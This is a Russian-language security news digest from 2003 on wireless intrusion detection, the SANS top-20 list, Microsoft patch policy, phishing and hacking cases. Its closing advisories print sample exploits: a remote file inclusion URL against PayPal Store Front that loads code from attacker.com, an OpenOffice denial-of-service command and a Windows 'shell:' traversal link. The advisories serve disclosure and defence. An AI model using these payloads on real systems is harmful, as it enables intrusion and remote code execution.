IBM сообщила о создании управляемой службы распознавания вторжений для беспроводных локальных сетей. Необходимость подобной службы, как считают в IBM, мотивирована "интенсивным ростом" количества зон доступа к WLAN в общественных местах, в домах и на предприятиях. Служба, основанная на технологиях разработки самой IBM, способна распознавать нелегальные точки доступа, DoS-атаки, ошибки в конфигурации точек и легко поддающиеся подбору ключи шифрования по алгоритму Wireless Equivalent Privacy. Как сообщил представитель IBM, служба получает данные от сети небольших управляемых Linux приставок-сенсоров, которые монтируются на стены в офисе клиента. Уведомления о предполагаемых атаках отправляются на консоль инструментария Tivoli Risk Manager, развернутого в операционном центре IBM Global Services; самим абонентам службы устанавливать у себя Tivoli не требуется. Пользователи будут получать ежедневные отчеты о зарегистрированных событиях безопасности, а также ежемесячный анализ тенденций. Пока службу можно применять только с сетями 802.11b, но идет работа над реализацией поддержки 802.11a и g, а также иных, кроме WEP, систем шифрования, в том числе WPA и Cisco LEAP.

В рамках выставки SofTool 2003 прошла Вторая научно-практическая конференция "Информационная безопасность корпоративных сетей", на которой обсуждались животрепещущие проблемы отрасли. В конференции принимали участие представители Гостехкомиссии, Московского комитета по науке и технологиям, МВД России, коммерческих и аналитических компаний. Общий объем российского рынка продуктов информационной безопасности оценивается в 30-50 млн. долл. в год. Наиболее высокие показатели роста, по оценкам IDC, ожидаются в сегментах 3А (администрирование, аутентификация и авторизация), обнаружения вторжений и оценки уязвимости. К 2007 году аналитики IDC прогнозируют, что объем российского рынка составит уже 100 млн. долл., увеличиваясь ежегодно на 28%. Российские компании имеют продукты практически для всех сегментов рынка инфобезопасности и могут получить значительную долю российских денег, несмотря на сильное финансовое давление международных компаний.

Почтовый клиент Outlook и ПО пиринговых сетей вошли в опубликованный американским институтом по исследованию проблем информационной безопасности SANS Institute ежегодный список 20 наиболее уязвимых приложений и протоколов, используемых хакерами для организации взломов. Данные продукты вошли в этот список впервые.

Сам список выглядит следующим образом:

• Уязвимости Windows-систем
  • Internet Information Services (IIS);
  • Microsoft SQL Server (MSSQL);
  • процедура аутентификации в Windows;
  • Internet Explorer (IE);
  • Сервисы удаленного доступа Windows;
  • Microsoft Data Access Components (MDAC);
  • Windows Scripting Host (WSH);
  • Microsoft Outlook Express;
  • Windows Peer to Peer File Sharing (P2P);
  • Simple Network Management Protocol (SNMP).
  Уязвимости UNIX-систем
  BIND Domain Name System;
  • Remote Procedure Calls (RPC);
  • Apache Web Server;
  • отсутствие паролей/простые пароли в системе аутентификации UNIX;
  • Clear Text Services;
  • Sendmail;
  • Simple Network Management Protocol (SNMP);
  • Secure Shell (SSH);
  • неправильная конфигурация корпоративных сервисов NIS/NFS;
  • Open Secure Sockets Layer (SSL).

В списке Windows-уязвимостей 5 новых пунктов (по сравнению с прошлым годом), Unix/Linux "разжился" 3 багами.

Компания Hitachi Data Systems объявила о своих планах выпуска систем хранения, которые помогут заказчикам соответствовать законодательным требованиям к хранению данных и отвечают потребностям в управлении информацией. Для этого объявлены стратегические улучшения в серии систем хранения корпоративного класса Hitachi Lightning 9900 V Series. Кроме того, компания анонсировала программные продукты, позволяющие заказчикам развертывать многоуровневые конфигурации хранения данных и создавать надежные платформы, обеспечивающие непрерывность бизнес-процессов.

Hitachi Data Systems анонсировала версию своего администратора хранения данных LDEV Guard для открытых систем, полностью интегрированную с корпоративными системами хранения Lightning 9900 V Series. Эта версия позволяет заказчикам сохранять и защищать важную корпоративную информацию. Функционируя как система с однократной записью и многократным чтением (Write Once Read Many, WORM), Open LDEV Guard позволяет создавать неизменяемые хранимые копии данных, отвечающие стандартам и нормам среды хранения. После записи данных в течение установленного периода хранения их можно только считывать с помощью приложений, имеющих санкционированный доступ, но не изменять или удалять. Кроме того, свойства Open LDEV Guard сохраняются при внутрисистемной репликации Hitachi ShadowImage, удаленной репликации Hitachi TrueCopy или межсистемной репликации HiCopy, когда данные тиражируются между системами Lightning 9900 V Series и Thunder 9500 V Series.

Также среди представленных Hitachi продуктов – решение Three Data Center Copy, которое обеспечивает защищенное и быстрое возобновление обслуживания независимо от масштаба стихийного бедствия или инцидента.

Решение Three Data Center Copy реализовано для мэйнфреймов с помощью продукта Hitachi CopyCentral, автоматизирующего централизованное управление программным обеспечением Hitachi TrueCopy и ShadowImage в масштабе предприятия в одном согласованном интерфейсе.

Кроме того, Hitachi представила решение eCopy, не требующее сервера резервное копирование между системами хранения Lightning 9900V и различными поддерживаемыми накопителями на магнитной ленте. Используя технологию ShadowImage, удается исключить непроизводительное использование сервера, обычно связанное с операциями резервного копирования.

Системы Hitachi Lightning 9900 V Series стоят от $200 тыс. до $8 млн., в зависимости от модели и конфигурации. Ключевые аппаратные усовершенствования в системах Hitachi Lightning 9900 V Series уже доступны. Другие средства заказчики смогут приобрести в течение ближайших 90 дней.

Источник: по материалам компании HDS.

Представители Cisco Systems объявили о планах усиления защиты системы аутентификации пользователей беспроводных сетей в связи с появившимися сообщениями о свободном распространении инструментария, предоставляющего возможность создавать "взламывающее" ПО. В начале августа специалисты Cisco впервые объявили о том, что алгоритм широко используемого протокола Lightweight Extensible Authentication Protocol (LEAP) уязвим перед атаками, направленными на раскрытие паролей пользователей: появилось сообщение на Web-сайте, и коммерческому персоналу было дано указание об информировании пользователей. Подобные атаки способны определить пароль в течение нескольких минут, заваливая систему огромным количеством слов и чисел. Применение паролей с увеличенным количеством символов и нечетной суммой используемых букв и цифр значительно повышает их безопасность. Такие рекомендации для формирования "сильных" паролей были даны ИТ-менеджерам специалистами Cisco 7 августа. В настоящее время предлагается возможность перехода от протокола LEAP к использующему одноразовые пароли и цифровые сертификаты протоколу Protected Extensible Authentication Protocol.

Обнаружившаяся на прошлой неделе утечка исходных кодов 3D-шутера Half-Life 2 вызвала весьма неприятные последствия не только для его разработчиков из компании Valve и издателя Vivendi, но и для простых геймеров. Информация о том, что из-за происшествия выпуск игры может быть отложен, появилась почти сразу, но только сейчас стал известен точный срок. Вместо начала сезона рождественских праздников Half-Life 2 выйдет на четыре месяца позже - в апреле следующего года.

Злоумышленникам удалось установить программу-троян на компьютер главы Valve Гэйбла Ньюмена и распространить ее на другие ПК компании. По словам Кристофа Рамбоса, одного из руководителей Vivendi Universal Games, злоумышленникам удалось скачать примерно третью часть всех исходников.

Перенос релиза Half-Life 2 - это серьезный удар по и без того неважному положению VUE. Один из главных проектов компании, Hulk, не оправдал надежд ни как игра, ни как кино, и по прогнозам аналитиков, это обойдется компании в несколько десятков миллионов долларов убытка.

Корпорация Microsoft намерена серьезно изменить свой подход к выпуску обновлений для программного обеспечения. Об этом на конференции для партнеров софтверного гиганта рассказал глава Microsoft Стив Баллмер. При этом совершенствование системы обновления программ Microsoft будет осуществлено по нескольким направлениям.

Во-первых, Баллмер рассказал, что компания намерена выпускать обновления не чаще, чем один раз в месяц. Исключение будет делаться только для критических заплаток, требующих немедленной установки. На такой шаг компания пойдет, исходя из пожеланий многих клиентов. Баллмер отметил, что до сих пор патчи выпускались по случайному графику, и у многих клиентов создавалось неприятное впечатление о том, что они должны бросать все насущные дела и устанавливать программные заплатки. Чтобы сделать процесс обновления ПО более удобным, патчи будут выпускаться в точно установленные сроки.

Вторым направлением совершенствования подхода к обновлению ПО станет совершенствование системы тестирования патчей и реализация возможности удаления обновлений, приведших к каким-либо нежелательным изменениям. По словам Баллмера. возможность удаления будет предусмотрена во всех без исключения заплатках, тогда как сейчас некоторые из патчей Microsoft невозможно деинсталлировать. Еще одним направлением работы станет забота о пользователях с медленными интернет-соединениями. Специально в их интересах Баллмер пообещал, что в будущем размеры обновлений сократятся на 30-80%.

Все вышеперечисленные меры будут реализованы в операционных системах, начиная с Windows 2000 и старше, к маю 2004 года.

Компания Microsoft выпустила обновление для браузера Internet Explorer с установленным Service Pack 1 и кумулятивным патчем, описанным в бюллетене безопасности MS03-032. Обновление устраняет ошибку в обработке скриптов на языке JavaScript, приводившее к отказу браузера отображать, открываемые скриптами страницы. Из-за изменений, внесенных в обработку JavaScript, при использовании в коде скрипта относительных ссылок браузер выдавал ошибку HTTP 404, так как не мог найти нужный файл.

Выпущенное Microsoft обновление предназначено для пользователей, который по каким-то причинам не могут установить более новый кумулятивный патч, описанный в бюллетене MS-03-040. Помимо ликвидации новых критических дыр в этом патче исправлены и проблемы с JavaScript.

Человек, работавший в офисе корпорации ViewSonic в Валнуте (Калифорния), признал себя виновным в Окружном суде штата Лос-Анджелес в взломе компьютерной системы компании, удалении важной информации, повлекшей за собой закрытие сервера, который являлся основным для иностранных операций компании.

38-летний Гарсия Эндрю признал себя виновным в получении доступа к защищенному компьютеру, которое нанесло для ViewSonic определенные убытки. ViewSonic - корпорация-производитель компьютерных мониторов, ежегодный доход которой более 1 миллиарда долларов. Гарсия был сетевым администратором в Валнутском офисе компании, где отвечал за несколько компьютерных серверов и имел доступ к паролям системы для служащих.

Согласно документам суда, 14 апреля 2002 года, спустя две недели после увольнения, Гарсия получил доступ к системе компьютеров ViewSonic и удалил несколько критически важных файлов на одном из серверов, который он поддерживал, работая в ViewSonic. Потеря этих файлов вывела сервер из строя, и офис компании был неспособен к приему важной информации в течение нескольких дней. Приговор будет вынесен 12 января 2004 года. Гарсии грозит 5 лет тюрьмы и штраф 250.000 долларов.
8

Почти 3 млн. австралийских пользователей интернета испытывали проблемы с электронной почтой на текущей неделе из-за неполадок, возникших в сетях трех крупнейших интернет-провайдеров страны - BigPond, OptusNet и OzEmail. В результате модернизации серверного ПО неправильно функционировала система обеспечения коммутируемого и широкополосного доступа компании BigPond, в итоге компания приняла решение вернуться к старой версии программного обеспечения. Сеть провайдера OptusNet была перегружена большим трафиком спама, в результате чего доставка электронной почты значительно замедлилась. А компания OzEmail боролась с DоS-атакой на свой SMTP-сервер. Представители всех компаний сообшили, что в настоящий момент проблемы в их сетях ликвидированы и начиная с сегодняшнего дня восстановлен нормальный трафик электроной почты.

Интернет-афера, в результате которой этим летом пострадали банки Европы, Америки, Австралии и Новой Зеландии, демонстрирует признаки активности и осенью. Исследовательская компания mi2g сообщает, что в последнее время появились новые жертвы мошенничества. Отличительной чертой данного мошенничества является то, что целью являются не банки, а их клиенты.

Пострадавшие организации довольно быстро отреагировали на появление в сети мошенничества, направленного на пользователей популярных в развитых странах интернет-услуг, таких, например, как интернет-банкинг. В течение короткого промежутка времени незаконные сайты были блокированы национальными службами по борьбе с ИТ-преступлениями. Однако есть все основания предполагать, что новая волна мошенничества с использованием фальшивых «банковских» сайтов не заставит долго ждать.

Для защиты своих клиентов, которые были обманным путем приглашены на фальшивые «банковские» интернет-страницы якобы для уточнения личной информации, паролей и другой конфиденциальной информации, некоторые пострадавшие банки прекратили выплату денежных средств в размере от $500 до $750.

Целью мошенников были не только банки, но и государственные учреждения (ФБР), крупные международные корпорации, коммерческие и информационные порталы, а также платежные системы. Похитители информации не обошли стороной такие компании, как Amazon, AOL, Best Buy, Discover Card, E-Bay, Earthlink и Paypal.

Интернет-мошенники через сфальсифицированные «банковские» рассылки приглашали ничего не подозревающих пользователей обновить их пароли и личную информацию. Ссылки из текста писем вели пользователей на фальшивые интернет-страницы, на которых использовались логотипы и другие знаки пострадавших банков. Жулики стремились заполучить конфиденциальную информацию клиента банка для совершения финансовых операций с его счетом или кредитной картой. Эксперты в сфере информационной безопасности и защиты информации считают, что без дальнейшего совершенствования средств, направленных на более точную идентификацию пользователя, будет практически невозможно избавиться от подобного рода мошенничеств.

По мнению экспертов из mi2g, сложная схема, которую использовали мошенники для совершения афер на трех континентах, позволяет предположить, что пострадавшие организации имеют дело с международными преступными группами.

Во всех бедах иностранные специалисты винят хакеров и спамеров из Китая, Нигерии, России и других стран бывшего Советского Союза, считая, что, вполне возможно, злоумышленники из этих стран имели самое непосредственное отношение к распространившимся в последнее время аферам с раскрытием конфиденциальной информации.

Принимая во внимание, что мошенничество имеет целенаправленный характер - интерес у мошенников вызывают только те клиенты банков, которые пользуются услугами интернет-банкинга, – эксперты из mi2g считают, что некоторые служащие банков могут сознательно раскрывать некоторые данные (телефон или электронный адрес) клиентов банка.

В 2003 году мировой экономический ущерб от хакерских атак - явных и скрытых, - а также от последствий распространения вирусов и червей может превысить $132 млрд. По сравнению с 2002 г., когда подобный ущерб составил $48,47 млрд., рост ущерба может приблизиться к отметке 200%.
10

В США тинэйджер, которого обвиняют в проведении хакерской атаки, заявляет, что это сделал не он, а другой, настоящий хакер, который удаленно взял под контроль его компьютер и попросту его "подставил". Цепочка его защиты беспрекословна и заслуживает всяческой похвалы: "Моя операционная система поддерживает удаленное администрирование. На тот момент патч был недоступен и мой компьютер, из-за дыры в Windows, мог контролировать кто угодно," заявляет Аарон Кафри.

Если Аарона оправдают, то будет создан весьма неприятный для американского правосудия прецедент, когда хакеру для оправдания будет достаточно доказать, что его компьютер в момент совершения преступления, мог быть в свою очередь также взломан со стороны. С другой стороны, это настолько реально, что Аарон действительно может быть невиновен. Судьи пока не знают, как им вести себя в такой ситуации и тянут дело до тех пор, пока не найдут разумный компромисс.
11

Правоохранительные органы многих стран продолжают выражать серьезную озабоченность в связи с ростом числа интернет-преступлений. При этом, если раньше мошенничеством и взломами в Сети занимались небольшие группы или одиночки, то теперь можно говорить о приходе в интернет самой настоящей организованной преступности.

Именно так считает Лен Хиндс, глава британского Национального управления по преступлениям в сфере высоких технологий (NHTCU). О своем видении проблемы Хиндс рассказал в интервью агентству Reuters. По мнению руководителя NHTCU наиболее уязвимыми перед интернет-преступниками являются индивидуальные пользователи интернета, компьютеры которых, как правило менее защищены, а сами пользователи зачастую слишком доверчивы.

Хиндс назвал несколько основных сфер, в которых работают организованные преступные группировки в интернете. Во-первых, это различные формы финансового мошенничества и воровство номеров кредитных карт. Наиболее распространенным является сценарий с созданием фальшивых сайтов известных финансовых организаций.

Злоумышленники заманивают на них доверчивых пользователей и просят указать реквизиты кредитных карт или банковских счетов. За нынешний год NHTCU зафиксировало 40 случаев подделки сайтов британских финансовых организаций. Годом ранее таких случаев было всего семь.
12

Программа: PayPal Cart, PayPal Store Front 3.0 и более ранние версии Опасность: Критческая Наличие эксплоита: Да Описание: Уязвимость обнаружена в PayPal Cart и PayPal Store Front. Злонамеренный пользователь может выполнить произвольный PHP код на уязвимом сервере. Программное обеспечение не проверяет параметр "page" в сценарии "index.php". В результате удаленный пользователь может выполнить произвольный PHP код с привилегиями Web сервера. Пример/Эксплоит: http://www.vulnsite.com/index.php?do=ext&page=http://www.attacker.com/index Где http://www.attacker.com/index.php URL производителя:http://www.muziqpakistan.net/~taz/ Решение: Установите неофициальное исправление: http://www.zone-h.org/download/file=4957

ZH2003-30SA (security advisory): file inclusion vulnerability in PayPal Store Front

Программа: OpenOffice 1.1.0 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в OpenOffice. Злонамереннный пользователь может вызвать отказ в обслуживании. Если используется UNO (Universal Network Objects) и он доступен из сети, то удаленный пользователь может завершить работу OpenOffice, посылая специально обработанные данные к слушающему порту. Пример/Эксплоит: C:\Programme\oo1.1.0\program> soffice "-accept=socket,host=<ip>,port=8100;urp;" URL производителя: http://www.Openoffice.org Решение: Ограничте доступ к UNO только доверенным IP адресам.

OpenOffice

Программа: Medieval Total War 1.1 и более ранние версии Опасность: Средняя Наличие эксплоита: Да Описание: Две уязвимости обнаружены в игре Medieval Total War. Удаленный пользователь может аварийно завершить работу целевого сервера. Удаленный пользователь может также завершить игру перед началом матча. Удаленный пользователь может послать nickname более 76 unicode символов, чтобы аварийно завершить работу целевого сервера. Также удаленный пользователь может послать некорректное прозвище, например нулевой длины к целевому серверу, чтобы целевой сервер отобразил "Connection expired" сообщение всем присоединенным клиентам. Пример/Эксплоит: http://aluigi.altervista.org/poc/mtwdos-server.zip URL производителя:http://www.totalwar.com/ Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Medieval Total War <= 1.1 broadcast crash

Программа: Microsoft Windows Server 2003 Опасность: средняя Наличие эксплоита: Да Описание: Недостаток обнаружен в Microsoft Windows Server 2003. Удаленный пользователь может сослаться на различные файлы относительно "Shell Folders" на целевой системе. Эта проблема может облегчить эксплуатацию других уязвимостей. Удаленный пользователь может сконструировать HTML, который может сослаться на различные "shell folders" на системе используя '..\' символы обхода каталога в комбинации с 'shell:' URL. Удаленный пользователь не должен знать или предполагать имя учетной записи целевого пользователя, чтобы получить доступ к этим директориям. Shell папки включают стандартные каталоги Windows, типа "My Documents", "Recent", "Start Menu", "Temporary Internet Files" и другие. Пример/Эксплоит: <a href="shell:cache\..\..\Local Settings\Temp\exploit.html">Exploit</a> URL производителя: http://www.microsoft.com/technet/security/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Согласно сообщению, исправление будет включено в следующий пакет исправлений для Microsoft Windows Server 2003. Сообщение ссылается на Microsoft Knowledge Base article KB829493, которая недоступна в настоящее время.

Microsoft Windows Server 2003 "Shell Folders" Directory Traversal Vulnerability

В важнейшем с момента представления Биллом Гейтсом инициативы Trustworthy Computing анонсе, посвященном безопасности, Баллмер сообщил участникам конференции Microsoft Worldwide Partner Conference в Новом Орлеане, что его компания удвоит усилия по обеспечению безопасности своих пользователей. «Наша цель проста: создать для заказчиков безопасные условия и поддерживать их, — говорится в заявлении Баллмера. — Мы должны защитить своих заказчиков от растущей волны преступных атак».

Microsoft сосредоточится на трех направлениях: совершенствование системы внесения поправок в свои продукты; добавление и улучшение технологий защиты в Windows XP и 2003; обучение заказчиков. Для системных администраторов, уставших от установки патчей на Windows-компьютеры, главным новшеством станет переход софтверного гиганта на ежемесячный график выпуска поправок. Microsoft приступает к выпуску обновлений для своих программ один раз в месяц, за исключением тех случаев, когда, чтобы предупредить опасность атаки, поправки надо внести немедленно, сказала директор по управлению продуктами отделения безопасности Microsoft Эми Кэрролл. «Наши заказчики жалуются, что устанавливать патчи еженедельно слишком трудоемко, — пояснила она. — А бывает, что распространение патча провоцирует появление кода-эксплойта».

К маю будущего года Microsoft планирует также сократить размер патчей на 30% и уменьшить число апдейтов, требующих перезагрузки системы пользователем. Количество систем внесения поправок в свои семейства продуктов Microsoft сократит до двух. Компания обещает также продолжить поддержку пользователей Windows NT4 service pack 6a и Windows 2000 service pack 2, которую компания было прекратила.

Опереться на достигнутое

По словам Кэрролл, Microsoft сосредоточится на совершенствовании и пополнении тех мер защиты, которые уже присутствуют в ее продуктах. Такие средства защиты ПК и сетей, как Internet Connection Firewall, будут включены по умолчанию и станут лучше взаимодействовать с другими приложениями. Практика фильтрации исполняемых файлов, защищающая пользователей Outlook от вложений, которые могут содержать вирусы и программы «троянских коней», будет распространена на другие продукты Microsoft. Система зон безопасности Internet Explorer будет усовершенствована. А в процесс разработки ПО и, возможно, аппаратуры будет добавлена усиленная защита от ошибок управления памятью. «Наши усилия направлены против четырех главных векторов атак, с которыми мы сталкиваемся», — сказала Кэрролл.

Компания планирует также развивать процесс обучения своих заказчиков, надеясь, что это поможет им лучше защититься. На сайте Microsoft будут публиковаться ежемесячные выпуски Webcast с рекомендациями по приемам защиты, а в качестве примера для обучения системных администраторов способам защиты систем компания использует свой собственный опыт — в сериях под названием «Как Microsoft защищает Microsoft». «Мы поставили перед собой цель к концу 2004 года обучить в той или иной мере 500 тыс. заказчиков», — сказала Кэрролл.

Компания Symantec в своем заявлении всецело поддержала инициативы Microsoft, несмотря на признаки возможного вторжения Microsoft на рынок антивирусного ПО. (В июне софтверный гигант купил румынскую антивирусную фирму GeCad.) В качестве причины, достаточной, чтобы поддерживать инициативы Microsoft, Symantec приводит недавний отчет, подготовленный ее специалистами. В отчете говорилось о том, что злоумышленники научились быстро использовать преимущество вновь обнаруженных пробелов в защите. «Сегодня пользователи компьютеров более чем когда-либо должны предпринимать правильные шаги для защиты от онлайновых угроз», — говорится в заявлении директора по маркетингу Symantec Джаниса Чаффина.

Со временем Microsoft обещает предоставить больше подробностей и непрерывно совершенствовать свои методы защиты до тех пор, пока не найдет нужный рецепт, сказал директор по управлению продуктами отделения клиентских версий Windows Microsoft Нил Чарни. «Заказчики доказали нам, что защита их систем — процесс не простой, — сказал он. — Движущей силой (этих изменений) служит признание того, что впереди еще много работы».